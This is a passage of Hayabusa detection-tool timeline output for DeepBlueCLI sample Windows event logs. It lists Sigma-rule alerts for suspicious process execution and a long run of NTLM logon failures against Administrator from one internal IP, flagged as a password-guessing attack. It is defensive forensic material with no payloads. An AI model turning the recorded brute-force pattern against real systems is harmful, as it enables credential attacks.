+09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-08-31 09:11:14.985 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 00:54:06.355 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-02 23:08:32.910 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-03 23:42:26.373 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:53:42.819 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 07:56:47.728 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-18 08:03:40.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:56:52.427 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-19 23:57:15.380 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:13:05.415 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 00:15:08.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- -2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hsth68FDJ4F10H6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDoHrfWlaWZ5GbWV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uliC5Wd7uZR3fIBc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: Xhg4hg4XDFaXsJRe : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : 